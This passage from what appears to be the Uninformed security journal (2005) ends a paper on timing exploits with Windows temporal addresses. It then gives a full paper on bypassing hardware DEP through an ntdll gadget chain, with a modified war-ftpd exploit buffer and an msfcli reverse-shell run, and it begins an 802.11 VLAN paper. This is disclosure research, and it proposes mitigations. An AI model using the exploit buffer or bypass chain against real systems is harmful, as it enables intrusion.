closely, it can be seen that these timer fields are actually updated
constantly as would be expected for any timer variable:
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7525 0fa00000 93fd5902 00000cca
7ffe0010 00000cca a78f0b48 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7558 0fa00000 9477d5d2 00000cca
7ffe0010 00000cca a808a336 01c59a46 01c59a46
0:000> dd 0x7ffe0000 L8
7ffe0000 055d7587 0fa00000 94e80a7e 00000cca
7ffe0010 00000cca a878b1bc 01c59a46 01c59a46
The three timing-related fields of most interest are TickCountLow,
InterruptTime, and SystemTime. These three fields will be explained
individually later in this chapter. Prior to that, though, it is important to
understand some of the properties of SharedUserData and why it is that it's
quite useful when it comes to temporal addresses.
7.1) The Properties of SharedUserData
There are a number of important properties of SharedUserData, some of
which make it useful in terms of temporal addresses and others that make it
somewhat infeasible depending on the exploit or hardware support. As far as
the properties that make it useful go, SharedUserData is located at a static
address, 0x7ffe0000, in every version of Windows NT+. Furthermore,
SharedUserData is mapped into every process. The reasons for this are that
NTDLL, and most likely other 3rd party applications, have been compiled and
built with the assumption that SharedUserData is located at a fixed address.
This is something many people are abusing these days when it comes to passing
code from kernel-mode to user-mode. On top of that, SharedUserData is required
to have a backward compatible data structure which means that the offsets of
all existing attributes will never shift, although new attributes may be, and
have been, appended to the end of the data structure. Lastly, there are a few
products for Windows that implement some form of ASLR. Unfortunately for these
products, SharedUserData cannot be feasibly randomized, or at least the author
is not aware of any approaches that wouldn't have severe performance impacts.
On the negative side of the house, perhaps the most limiting factor when it
comes to making use of SharedUserData is that it has a null byte located at
byte index one. Depending on the vulnerability, it may or may
not be possible to use an attribute within SharedUserData as a return address
due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1,
SharedUserData is no longer marked as executable and will result in a DEP
violation (if enabled) assuming the hardware supports PAE. While this is not
very common yet, it is sure to become the norm over the course of time.
7.2) Locating Temporal Addresses
As seen previously in this document, using the telescope program on any
Windows application will result in the same two (or three) timers being
displayed:
C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
Referring to the structure definition described at the beginning of this
chapter, it is possible for one to determine which attribute each of these
addresses is referring to. Each of these three attributes will be discussed
in detail in the following sub-sections.
7.2.1) TickCountLow
The TickCountLow attribute is used, in combination with the
TickCountMultiplier, to convey the number of milliseconds that have occurred
since system boot. To calculate the number of milliseconds since system boot,
the following equation is used:
T = shr(TickCountLow * TickCountMultiplier, 24)
This attribute is representative of a temporal address that has a counter
scale. It starts at an unknown time and increments at constant intervals. The
biggest problem with this attribute is the interval that it increases at.
It's possible that two machines in the same room with different hardware will
have different update periods for the TickCountLow attribute. This makes it
less feasible to use as a temporal address because the update period cannot be
readily predicted. On the other hand, it may be possible to determine the
current uptime of the machine through TCP timestamps or some alternative
mechanism, but without the ability to determine the update period, the
TickCountLow attribute seems unusable.
This attribute is located at 0x7ffe0000 on all versions of Windows NT+.
7.2.2) InterruptTime
This attribute is used to store a 100 nanosecond timer starting at system boot
that presumably counts the amount of time spent processing interrupts. The
attribute itself is stored as a KSYSTEM_TIME structure which is defined as:
0:000> dt _KSYSTEM_TIME
+0x000 LowPart : Uint4B
+0x004 High1Time : Int4B
+0x008 High2Time : Int4B
Depending on the hardware a machine is running, the InterruptTime's period may
be exactly equal to 100 nanoseconds. However, testing has seemed to confirm
that this is not always the case. Given this, both the update period and the
scale of the InterruptTime attribute should be seen as limiting factors. This
fact makes it less useful because it has the same limitations as the
TickCountLow attribute. Specifically, without knowing when the system booted
and when the counter started, or how much time has been spent processing
interrupts, it is not possible to reliably predict when certain bytes will be
at certain offsets. Furthermore, the machine would need to have been booted
for a significant amount of time in order for some of the useful instructions
to be feasibly found within the bytes that compose the timer.
This attribute is located at 0x7ffe0008 on all versions of Windows NT+.
7.2.3) SystemTime
The SystemTime attribute is by far the most useful attribute when it comes to
its temporal address qualities. The attribute itself is a 100 nanosecond
timer that is measured from Jan. 1, 1601 which is stored as a KSYSTEM_TIME
structure like the InterruptTime attribute. See the InterruptTime sub-section
for a structure definition. This means that it has an update period of 100
nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also
measured relative to the timezone that the machine is using (with the
exclusion of daylight savings time). If an attacker is able to obtain
information about the system time on a target machine, it may be possible to
make use of the SystemTime attribute as a valid temporal address for
exploitation purposes.
This attribute is located at 0x7ffe0014 on all versions of Windows NT+.
7.3) Calculating Viable Opcode Windows
After analyzing SharedUserData for temporal addresses it should become clear
that the SystemTime attribute is by far the most useful and potentially
feasible attribute due to its scale and update period. In order to
successfully leverage it in conjunction with an exploit, though, the viable
opcode windows must be calculated so that a time to strike can be selected.
This can be done prior to determining what the actual date is on a target
machine but requires that the storage capacity (size of the temporal address
in bytes), the update period, and the scale be known. In this case, the size
of the SystemTime attribute is 12 bytes, though in reality the 3rd attribute,
High2Time, is exactly the same as the second, High1Time, so all that really
matters are the first 8 bytes. Doing the math to calculate per-byte durations
gives the results shown in figure 4.1. This indicates that it is only
worth focusing on opcode permutations that start at byte index four due to the
fact that all previous byte indexes have a duration of less than or equal to
one second. By applying the scale as being measured since Jan 1, 1601, all of
the possible permutations for the past, present, and future can be calculated
as described in chapter 5. The results of these calculations for the
SystemTime attribute are described in the following paragraphs.
In order to calculate the viable opcode windows it is necessary to have
identified the viable set of opcodes. In this case study a total of 320
viable opcodes were used (recall that opcode in this case can mean one or more
instruction). These viable opcodes were taken from the Metasploit Opcode
Database. After performing the necessary calculations and generating all of
the permutations, a total of 3615 viable opcode windows were found between
Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into
groupings of similar or equivalent opcodes such that it could be made easier
to visualize.
Looking closely at these figures it can be seen that there were two large
spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which
includes pop/pop/ret instructions common to SEH overwrites. Looking more
closely at these two years shows that there were two significant periods of
time during 2002 and 2003 where the stars aligned and certain exploits could
have used the SystemTime attribute as a temporal return address. Figure shows
the spikes in more detail. It's a shame that this technique was not published
about during those time frames! Never again in the lifetime of anyone who
reads this paper will there be such an occurrence.
Perhaps of more interest than past occurrences of certain opcode groups is
what will come in the future. The table in figure 7.1 shows the upcoming
viable opcode windows for 2005.
Date Opcode Group
------------------------------------------
Sun Sep 25 22:08:50 CDT 2005 eax => eip
Sun Sep 25 22:15:59 CDT 2005 ecx => eip
Sun Sep 25 22:23:09 CDT 2005 edx => eip
Sun Sep 25 22:30:18 CDT 2005 ebx => eip
Sun Sep 25 22:37:28 CDT 2005 esp => eip
Sun Sep 25 22:44:37 CDT 2005 ebp => eip
Sun Sep 25 22:51:47 CDT 2005 esi => eip
Sun Sep 25 22:58:56 CDT 2005 edi => eip
Tue Sep 27 04:41:21 CDT 2005 eax => eip
Tue Sep 27 04:48:30 CDT 2005 ecx => eip
Tue Sep 27 04:55:40 CDT 2005 edx => eip
Tue Sep 27 05:02:49 CDT 2005 ebx => eip
Tue Sep 27 05:09:59 CDT 2005 esp => eip
Tue Sep 27 05:17:08 CDT 2005 ebp => eip
Tue Sep 27 05:24:18 CDT 2005 esi => eip
Tue Sep 27 05:31:27 CDT 2005 edi => eip
Tue Sep 27 06:43:02 CDT 2005 [esp + 0x20] => eip
Fri Oct 14 14:36:48 CDT 2005 eax => eip
Sat Oct 15 21:09:19 CDT 2005 ecx => eip
Mon Oct 17 03:41:50 CDT 2005 edx => eip
Tue Oct 18 10:14:22 CDT 2005 ebx => eip
Wed Oct 19 16:46:53 CDT 2005 esp => eip
Thu Oct 20 23:19:24 CDT 2005 ebp => eip
Sat Oct 22 05:51:55 CDT 2005 esi => eip
Sun Oct 23 12:24:26 CDT 2005 edi => eip
Thu Nov 03 23:17:07 CST 2005 eax => eip
Sat Nov 05 05:49:38 CST 2005 ecx => eip
Sun Nov 06 12:22:09 CST 2005 edx => eip
Mon Nov 07 18:54:40 CST 2005 ebx => eip
Wed Nov 09 01:27:11 CST 2005 esp => eip
Thu Nov 10 07:59:42 CST 2005 ebp => eip
Fri Nov 11 14:32:14 CST 2005 esi => eip
Sat Nov 12 21:04:45 CST 2005 edi => eip
Figure 7.1: Opcode windows for Sept 2005 - Jan 2006
8) Case study: Example application
Aside from Windows' processes having SharedUserData present, it may also be
possible, depending on the application in question, to find other temporal
addresses at static locations across various operating system versions. Take
for instance the following example program that simply calls time every second
and stores it in a local variable on the stack named t:
#include <windows.h>
#include <time.h>
int main(void) {
    unsigned long t;
    while (1) {
        /* Store the number of seconds since 1970 in a stack local. */
        t = (unsigned long)time(NULL);
        SleepEx(1000, TRUE);
    }
}
When the telescope program is run against a running instance of this example
program, the results produced are:
C:\>telescope 3004
[*] Attaching to process 3004 (5 polling cycles)...
[*] Polling address space........
Temporal address locations:
0x0012FE24 [Size=4, Scale=Counter, Period=70 msec]
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FE9C [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
Judging from the source code of the example application it would seem clear
that the address 0x0012ff7c coincides with the local variable t which is used
to store the number of seconds since 1970. Indeed, the t variable also has an
update period of one second as indicated by the telescope program. The other
finds may be either inaccurate or not useful depending on the particular
situation, but due to the fact that they were identified as counters instead
of being relative to one of the two epoch times most likely makes them
unusable.
In order to write an exploit that can leverage the temporal address t, it is
first necessary to take the steps outlined in this document with regard to
calculating the duration of each byte index and then building a list of all
the viable opcode permutations. The duration of each byte index for a four
byte timer with a one second period are shown in figure 8.1.
Byte Index Seconds (ext)
------------------------
0 1 (1 sec)
1 256 (4 mins 16 secs)
2 65536 (18 hours 12 mins 16 secs)
3 16777216 (194 days 4 hours 20 mins 16 secs)
Figure 8.1: 4 byte 1sec per-byte durations in seconds
The starting byte index for this temporal address is byte index one due to the
fact that it has the smallest feasible window of time for an exploit to be
launched (4 mins 16 secs). After identifying this starting byte index,
permutations for all the viable opcodes can be generated.
Nearly all of the viable opcode windows have a window of 4 minutes. Only a
few have a window of 18 hours. To get a better idea for what the future has
in store for a timer like this one, figure 8.2 shows the upcoming viable opcode
windows for 2005.
Date Opcode Group
------------------------------------------
Fri Sep 02 01:28:00 CDT 2005 [reg] => eip
Thu Sep 08 21:18:24 CDT 2005 [reg] => eip
Fri Sep 09 15:30:40 CDT 2005 [reg] => eip
Sat Sep 10 09:42:56 CDT 2005 [reg] => eip
Sun Sep 11 03:55:12 CDT 2005 [reg] => eip
Tue Sep 13 10:32:00 CDT 2005 [reg] => eip
Wed Sep 14 04:44:16 CDT 2005 [reg] => eip
Figure 8.2: Opcode windows for Sept 2005 - Jan 2006
9) Conclusion
Temporal addresses are locations in memory that are tied to a timer of some
sort, such as a variable storing the number of seconds since 1970. Like a
clock, temporal addresses have an update period, meaning the rate at which its
contents are changed. They also have an inherent storage capacity which
limits the amount of time they can convey before being rolled back over to the
start. Finally, temporal addresses will also always have a scale associated
with them that indicates the unit of measure for the contents of a temporal
address, such as whether it's simply being used as a counter or whether it's
measuring the number of seconds since 1970. These three attributes together
can be used to predict when certain byte combinations will occur within a
temporal address.
This type of prediction is useful because it can allow an exploitation
chronomancer the ability to wait until the time is right and then strike once
predicted byte combinations occur in memory on a target machine. In
particular, the byte combinations most useful would be ones that represent
useful opcodes, or instructions, that could be used to gain control over
execution flow and allow an attacker to exploit a vulnerability. Such an
ability can give the added benefit of providing an attacker with universal
return addresses in situations where a temporal address is found at a static
location in memory across multiple operating system and application revisions.
An exploitation chronomancer is one who is capable of divining the best time
to exploit something based on the alignment of certain bytes that occur
naturally in a process' address space. By making use of the techniques
described in this document, or perhaps ones that have yet to be described or
disclosed, those who have yet to dabble in the field of chronomancy can begin
to get their feet wet. Viable opcode windows will come and go, but the
usefulness of temporal addresses will remain for eternity, or at least as long
as computers as they are known today are around.
The fact of the matter is, though, that while the subject matter discussed in
this document may have an inherent value, the likelihood of it being used for
actual exploitation is slim to none due to the variance and delay between
viable opcode windows for different periods and scales of temporal addresses.
Or is it really that unlikely? Vlad902 suggested a scenario where an attacker
could compromise an NTP server and configure it to constantly return a time
that contains a useful opcode for exploitation purposes. All of the machines
that synchronize with the compromised NTP server would then eventually have a
predictable system time. While not completely foolproof considering it's not
always known how often NTP clients will synchronize (although logs could be
used), it's nonetheless an interesting approach. Regardless of feasibility,
the slave that is knowledge demands to be free, and so it shall.
Bibliography
Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP).
http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug
5, 2005.
Metasploit Project. The Metasploit Opcode Database.
http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug
6, 2005.
Postel, J. RFC 792 - Internet Control Message Protocol.
http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug
5, 2005.
uninformed/2.3.txt
Bypassing Windows Hardware-enforced Data Execution Prevention
Oct 2, 2005
skape (mmiller@hick.org)
Skywing (Skywing@valhallalegends.com)
One of the big changes that Microsoft introduced in Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1 was support for a new feature called Data
Execution Prevention (DEP). This feature was added with the intention of doing
exactly what its name implies: preventing the execution of code in
non-executable memory regions. This is particularly important when it comes to
preventing the exploitation of most software vulnerabilities because most
exploits tend to rely on storing arbitrary code in what end up being
non-executable memory regions, such as a thread stack or a process heap [1].
DEP itself is capable of functioning in two modes. The first mode is referred
to as Software-enforced DEP. It provides fairly limited support for preventing
the execution of code through exploits that take advantage of Structured
Exception Handler (SEH) overwrites. Software-enforced DEP is used on
machines that are not capable of supporting true non-executable pages due to
inadequate hardware support. Software-enforced DEP is also a compile-time only
change, and as such is typically limited to system libraries and select
third-party applications that have been recompiled to take advantage of it.
Bypassing this mode of DEP has been discussed before and is not the focus of
this document.
The second mode in which DEP can operate is referred to as Hardware-enforced
DEP. This mode is a superset of software-enforced DEP and is used on hardware
that supports marking pages as non-executable. While most existing Intel-based
hardware does not have this feature (due to legacy support for only marking
pages as readable or writable), newer chipsets are beginning to have true
hardware support through things like Physical Address Extension (PAE).
Hardware-enforced DEP is the most interesting of the two modes since it can be
seen as a truly mitigating factor to most common exploitation vectors. The
bypass technique described in this document is designed to be used against
this mode.
Before describing the technique, it is prudent to understand the parameters
under which it will operate. In this case, the technique is meant to provide a
way of executing code from regions of memory that would not typically be
executable when hardware-enforced DEP is in use, such as a thread stack or a
process heap. This technique can be seen as a means of eliminating DEP from the
equation when it comes to writing exploits because the commonly used approach of
executing custom code from a writable memory address can still be used.
Furthermore, this technique is meant to be as generic as possible such that it
can be used in both existing and new exploits without major modifications. With
the parameters set, the next requirement is to understand some of the new
features that compose hardware-enforced DEP.
When implementing support for DEP, Microsoft rightly realized that many existing
third-party applications might run into major compatibility issues due to
assumptions about whether or not a region of allocated memory is executable. In
order to handle this situation, Microsoft designed DEP so that it could be
configured in a few different manners. At the most general level, DEP is
designed to have a default parameter that indicates whether or not
non-executable protection is enabled only for system processes and custom
defined applications (OptIn), or whether it's enabled for everything except for
applications that are specifically exempted (OptOut). These two flags are
passed to the kernel during boot through the /NoExecute option in boot.ini.
Furthermore, two other flags can be passed as part of the NoExecute option to
indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a
flag to be set for each process that permanently enables or disables DEP. The
default setting on Windows XP SP2 is OptIn, while the default setting on Windows
2003 Server SP1 is OptOut.
Aside from the global system parameter, DEP can also be enabled or disabled on a
per-process basis. The disabling of non-executable (NX) support for a process
is determined at execution time. To support this, a new internal routine was
added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few
different things to determine whether or not NX support should be enabled for
the process. The routine itself is called whenever a DLL is loaded in the
context of a process through LdrpRunInitializationRoutines. The first check it
performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is
flagged as needing to be disabled for the process. The second check it performs
is to look in the application database for the process to see if NX support
should be disabled or enabled. Lastly, it checks to see if the DLL that is
being loaded is flagged as having an NX incompatible section (such as .aspack,
.pcle, and .sforce).
As a result of these checks, NX support is either enabled or disabled through a
new PROCESSINFOCLASS named ProcessExecuteFlags (0x22). When a call to
NtSetInformationProcess is issued with this information class, a four byte
bitmask is supplied as the buffer parameter. This bitmask is passed to
nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a
flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the
bitmask that indicates that future calls to the function should fail such that
the execute flags cannot be changed again. To enable NX support, the
MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the
MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of
these per-process flags, execution of code from non-executable memory regions
will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied
(MEM_EXECUTE_OPTION_DISABLE).
If it were in some way possible for an attacker to change the execution flags of
a process that is being exploited, then it follows that the attacker would be
able to execute code from previously non-executable memory regions. In order to
do this, though, the attacker would have to run code from regions of memory that
are already executable. As chance would have it, there happen to be useful
executable memory regions, and they exist at the same address in every process
[2].
To take advantage of this feature, an attacker must somehow cause
NtSetInformationProcess to be called with the ProcessExecuteFlags information
class. Furthermore, the ProcessInformation parameter must be set to a bitmask
that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the
MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to
this function that would disable NX support for the calling process:
ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;
NtSetInformationProcess(
NtCurrentProcess(), // (HANDLE)-1
ProcessExecuteFlags, // 0x22
&ExecuteFlags, // ptr to 0x2
sizeof(ExecuteFlags)); // 0x4
One method of accomplishing this would be to use a ret2libc derived attack
whereby control flow is transferred into the NtSetInformationProcess function
with an attacker-controlled frame set up on the stack. In this case, the
arguments described to the right in the above code snippet would have to be set
up on the stack so that they would be interpreted correctly when
NtSetInformationProcess begins executing. The biggest drawback to this approach
is that it would require NULL bytes to be usable as part of the buffer that is
used for the overflow. Generally speaking, this will not be possible,
especially with any overflow that is caused through the use of a string
function. However, when possible, this approach can certainly be useful.
Though a direct return into NtSetInformationProcess may not be universally
feasible, another technique can be used that lends itself to being more
generally applicable. Under this approach, the attacker can take advantage of
code that already exists within ntdll for disabling NX support for a process.
By returning into a specific chunk of code, it is possible to disable NX support
just as ntdll would while still being able to transfer control back into a
user-controlled buffer. The one limitation, however, is that the attacker must be
able to control the stack in a way similar to most ret2libc style attacks, but
without the need to control arguments.
The first step in this process is to cause control to be transferred to a
location in memory that performs an operation that is equivalent to a mov al,
0x1 / ret combination. Many instances of similar instructions exist (xor eax,
eax/inc eax/ret; mov eax, 1/ret; etc). One such instance can be found in the
ntdll!NtdllOkayToLockRoutine function.
ntdll!NtdllOkayToLockRoutine:
7c952080 b001 mov al,0x1
7c952082 c20400 ret 0x4
This will cause the low byte of eax to be set to one for reasons that will
become apparent in the next step. Once control is transferred to the mov
instruction, and then subsequently the ret instruction, the attacker must have
set up the stack in such a way that the ret instruction actually returns into
another segment of code inside ntdll. Specifically, it should return part of
the way into the ntdll!LdrpCheckNXCompatibility routine.
ntdll!LdrpCheckNXCompatibility+0x13:
7c91d3f8 3c01 cmp al,0x1
7c91d3fa 6a02 push 0x2
7c91d3fc 5e pop esi
7c91d3fd 0f84b72a0200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba)
In this block, a check is made to see if the low byte of eax is set to one.
Regardless of whether or not it is, esi is initialized to hold the value 2.
After that, a check is made to see if the zero flag is set (as would be the case
if the low byte of eax is 1). Since this code will be executed after the first
mov al, 0x1 / ret set of instructions, the ZF flag will always be set, thus
transferring control to 0x7c93feba.
ntdll!LdrpCheckNXCompatibility+0x1a:
7c93feba 8975fc mov [ebp-0x4],esi
7c93febd e941d5fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403)
This block sets a local variable to the contents of esi, which in this case is
2. Afterwards, it transfers to control to 0x7c91d403.
ntdll!LdrpCheckNXCompatibility+0x1d:
7c91d403 837dfc00 cmp dword ptr [ebp-0x4],0x0
7c91d407 0f8560890100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d)
This block, in turn, compares the local variable that was just initialized to 2
with 0. If it's not zero (which it won't be), control is transferred to
0x7c935d6d.
ntdll!LdrpCheckNXCompatibility+0x4d:
7c935d6d 6a04 push 0x4
7c935d6f 8d45fc lea eax,[ebp-0x4]
7c935d72 50 push eax
7c935d73 6a22 push 0x22
7c935d75 6aff push 0xff
7c935d77 e8b188fdff call ntdll!ZwSetInformationProcess (7c90e62d)
7c935d7c e9c076feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441)
It's at this point that things begin to get interesting. In this block, a call
is issued to NtSetInformationProcess with the ProcessExecuteFlags information
class. The ProcessInformation parameter pointer is passed which was previously
initialized to 2 [3]. This results in NX support being disabled for the process.
After the call completes, it transfers control to 0x7c91d441.
ntdll!LdrpCheckNXCompatibility+0x5c:
7c91d441 5e pop esi
7c91d442 c9 leave
7c91d443 c20400 ret 0x4
Finally, this block simply restores saved registers, issues a leave instruction,
and returns to the caller. In this case, the attacker will have set up the
frame in such a way that the ret instruction actually returns into a general
purpose instruction that transfers control into a controllable buffer that
contains the arbitrary code to be executed now that NX support has been
disabled.
This approach requires the knowledge of three addresses. First, the address of
the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many
occurrences of this type of block, though they may not be as simplistic as the
one described in this document. Second, the address of the start of the cmp al,
0x1 block inside ntdll!LdrpCheckNXCompatibility must be known. By depending on
two addresses within ntdll, it stands to reason that an exploit can be more
portable than if one were to depend on addresses from two different DLLs.
Finally, the third address is the one that would be the one that is typically
used on targets that didn't have hardware-enforced DEP, such as a jmp esp or
equivalent instruction depending on the vulnerability in question.
Aside from specific address limitations, this approach also relies on the fact
that ebp is pointed to a valid, writable address such that the value that
indicates that NX support should be disabled can be temporarily stored. This
can be accomplished a few different ways, depending on the vulnerability, so it
is not seen as a largely limiting factor.
To test this approach, the authors modified the warftpd_165_user exploit from
the Metasploit Framework that was written by Fairuzan Roslan. This
vulnerability is a simple stack overflow. Prior to our modifications, the
exploit was implemented in the following manner:
my $evil = $self->MakeNops(1024);
substr($evil, 485, 4, pack("V", $target->[1]));
substr($evil, 600, length($shellcode), $shellcode);
This code built a NOP sled of 1024 bytes. At byte index 485, the return address
was stored after which point the shellcode was appended [4]. When run against a target
that supports hardware-enforced DEP, the exploit fails when it tries to execute
the first instruction of the NOP sled because the region of memory (the thread
stack) is marked as non-executable.
Applying the technique described above, the authors changed the exploit to send
a buffer structured as follows:
my $evil = "\xcc" x 485;
$evil .= "\x80\x20\x95\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xf8\xd3\x91\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xcc" x 0x54;
$evil .= pack("V", $target->[1]);
$evil .= $shellcode;
$evil .= "\xcc" x (1024 - length($evil));
In this case, a buffer was built that contained 485 int3 instructions. From
there, the buffer was set to overwrite the return address with a pointer to
ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four
bytes are padding as a fake argument that is popped off the stack. Once
NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil
buffer that is being built (immediately after the 0x7c952080 return address
overwrite and the fake argument). This means that NtdllOkayToLockRoutine would
return into 0x7c91d3f8. This block of code is what evaluates the low byte of
eax and eventually leads to the disabling of NX support for the process. Once
completed, the block pops saved registers off the stack and issues a leave
instruction, moving the stack pointer to where ebp currently points. In this
case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding.
Once the block does this, the stack pointer will point 577 bytes into the evil
buffer (immediately after the 0x54 bytes of padding). This means that it will
return into whatever address is stored at this location. In this case, the
buffer is populated such that it simply returns into the target-specified return
address (which is a jmp esp equivalent instruction). From there, the jmp esp
instruction is executed which transfers control into the shellcode that
immediately follows it. Once executed, the exploit works as if nothing had
changed:
$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \
LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E
[*] Starting Reverse Handler.
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
[*] Sending evil buffer....
[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\War-ftpd>
As can be seen, the technique described in this document outlines a feasible
method that can be used to circumvent the security enhancements provided by
hardware-enforced DEP in the default installations of Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1. The flaw itself is not related to any
specific inefficiency or mistake made during the actual implementation of
hardware-enforced DEP support, but instead is a side effect of a design decision
by Microsoft to provide a mechanism for disabling NX support for a process from
within a user-mode process. Had it been the case that there was no mechanism by
which NX support could be disabled at runtime from within a process, the
approaches outlined in this document would not be feasible.
In the interest of not presenting a problem without also describing a solution,
the authors have identified a few different ways in which Microsoft might be
able to solve this. To prevent this approach, it is first necessary to identify
the things that it depends on. First and foremost, the technique depends on
knowing the location of three separate addresses. Second, it depends on the
feature being exposed that allows a user-mode process to disable NX support for
itself. Finally, it depends on the ability to control the stack in a manner
that allows it to perform a ret2libc style attack [5].
The first dependency could be broken by instituting some form of Address Space
Layout Randomization that would thereby make the location of the dependent code
blocks unknown to an attacker. The second dependency could be broken by moving
the logic that controls the enabling and disabling of a process' NX support to
kernel-mode such that it cannot be influenced in such a direct manner. This
approach is slightly challenging considering the model that it is currently
implemented under requires the ability to disable NX support when certain events
(such as the loading of an incompatible DLL) occur. Although it may be more
challenging, the authors see this as being the most feasible approach in terms
of compatibility. Lastly, the final dependency is not really something that
Microsoft can control. Aside from these potential solutions, it might also be
possible to come up with a way to make it so the permanent flag is set sooner in
the process' initialization, though the authors are not sure of a way in which
this could be made possible without breaking support for disabling when certain
DLLs are loaded.
In closing, the authors would like to make a special point to indicate that
Microsoft has done an excellent job in raising the bar with their security
improvements in XP Service Pack 2. The technique outlined in this document
should not be seen as a case of Microsoft failing to implement something
securely, as the provisions are certainly there to deploy hardware-enforced DEP
in a secure fashion, but instead might be better viewed as a concession that was
made to ensure that application compatibility was retained for the general case.
There is almost always a trade-off when it comes to providing new security
features in the face of potential compatibility problems, and it can be said
that perhaps no company other than Microsoft is more well known for retaining
backward compatibility.
Footnotes
[1] There are other documented techniques for bypassing non-executable
protections, such as returning into ZwProtectVirtualMemory or doing a chained
ret2libc style attack, but these approaches tend to be more complicated and in
many cases are more restricted due to the need to use bytes (such as NULL
bytes) that would otherwise be unusable in common situations.
[2] With a few parameters that will be discussed later.
[3] The reason this has to point to 2 and not some integer that has just the low
byte set to 2 is because nt!MmSetExecutionOptions has a check to ensure that the
unused bits are not set.
[4] In reality, it may not be the return address that is being overwritten, but
instead might be a function pointer. The fact that it is at a misaligned
address lends credence to this fact, though it is certainly not a clear
indication.
[5] This is possible even when an SEH overwrite is leveraged, given the right
conditions. The basic approach is to locate a pop reg, pop reg, pop esp, ret
instruction set in a region that is not protected by SafeSEH (such as a
third-party DLL that was not compiled with /GS). The pop esp shifts the stack
to the start of the EstablisherFrame that is controlled by the attacker and the
ret returns into the address stored within the overwritten Next pointer. If one
were to set the Next pointer to the location of the NtdllOkayToLockRoutine and
the stack were set up as explained above, the technique used to bypass
hardware-enforced DEP that is described in this document could be made to work.
Bibliography
The Metasploit Project. War-ftpd 1.65 USER Overflow.
http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user;
accessed Oct 2, 2005.
Microsoft Corporation. Data Execution Prevention.
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx;
accessed Oct 2, 2005.
uninformed/2.4.txt
802.11 VLANs
Johnny Cache
johnycsh@gmail.com
Last modified: 09/07/05
1) Foreword
Abstract: The goal of this paper is to introduce the reader to association
redirection and how it could to used to implement something analogous to VLANs
found in wired media into a typical IEEE 802.11 environment. What makes this
technique interesting is that it can be accomplished without breaking the IEEE
802.11 standard on the client side, and requires only minor changes made to the
Access Point (AP). No modifications are made to the 802.11 MAC. It is the
author's hope that after reading this paper the reader will not only
understand the specific technique outlined below, but will consider protocol
quirks with a new perspective in the future.
2) Background
The IEEE 802.11 specification defines a hierarchy of three states a client can
be in. When a client wishes to connect to an Access Point (AP) he progresses
from state 1 to 2 to 3. The client progresses initially from state 1 to state 2
by successfully authenticating (this authentication stage happens even when
there is no security enabled). Similarly the client progresses from state 2 to
3 by associating. Once a client has associated he enters state 3 and can
transmit data using the AP.
Unlike ethernet, 802.3, or other link layer headers, 802.11 headers contain at
least 3 addresses: source, destination, and Basic Service Set ID (BSSID). The
BSSID can best be thought of as a "through" field. Packets destined for the AP's
interface have both destination and BSSID set to the same value. A packet
destined to a different host on the same WLAN however would have the BSSID set
to the AP and the destination set to the host.
The state transition diagram in the standard dictates that if a client receives
an association response with a different BSSID than the BSSID that it was
associating with, then the client should associate to the new BSSID. The
technique of sending an association response with a different BSSID in the
header is known as association redirection. While the motivation for this
idiosyncrasy is unclear, it can be leveraged to dynamically create what has
been described as a personal virtual bridged LAN (PVLAN).
3) Introduction
The most compelling reason to virtualize APs has been security. There are
currently two possible techniques for doing this, though only one has been
deployed in the wild. The most prevalent has been implemented by Colubris in
their virtual access point technology.
The other technique, public access point (PAP) and personal virtual bridged
LANs (PVLANs), which is described in this paper, has been documented in U.S.
patent no. 20040141617.
3.1) The state of the art
The Colubris virtual access point technology is a single physical device that
implements an entirely independent 802.11 MAC protocol layer (including a
